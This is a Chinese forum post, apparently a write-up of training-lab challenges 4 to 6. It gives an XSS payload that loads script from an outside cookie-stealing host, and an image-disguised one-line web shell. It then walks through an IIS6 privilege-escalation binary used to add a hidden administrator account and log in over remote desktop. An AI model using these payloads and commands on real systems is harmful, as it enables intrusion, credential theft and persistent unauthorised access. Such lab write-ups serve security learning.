4-6攻略

houwentao   ·   发表于 2018-06-09 23:07:13   ·   CTF&WP专版

四题

xss网址  https://www.xss9.com

复制这句代码<sCRiPt sRC=https://xss9.com/rbQP></sCrIpT>

然后提交

注入成功


钓到了 


五题

cookie


勾上 cookie 点击一次    准备好了吗?

                                               

却掉勾选 再点一次  准备好了吗?

一句话木马(图片码)

注入成功


进入根目录

PS 我因为自己的图标 和根目录上的图标不一致  就没找出来 一度怀疑智商

六题

鼠标右键 上传 cmd和iis6

对着cmd右键虚拟终端

输入whoami

证明已经进入到了 对方的cmd


下面的任务  创建账号 ,远程端口  然后提权


创建账号

E:5\UploadFiles\> cd..

E:5\> E:\RECYCLER\iis6.exe "whoami"


提权


E:5\> E:\RECYCLER\iis6.exe "net user LostSoul 123456 /add"

创建账号成功




3389 端口


命令tasklist –svc  

Termsrvice→远程桌面的服务名  pid服务名  留意



命令netstat-ano

pid 服务名 相同

 

找到了3389 路径



提权管理员用户组

net localgroup administrators



E:5\>  E:\RECYCLER\iis6.exe "Net localgroup administrators LostSoul /add


net localgroup administrators



点击win   点击运行  输入mstsc

链接

登录


如果遇到这个问题



在连接登录


然后就我的电脑C  flag


打赏我,让我更有动力~

1 条回复   |  直到 2018-6-10 | 1973 次浏览

120747572
发表于 2018-6-10

感谢楼主,iis6能提供个下载方式吗

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.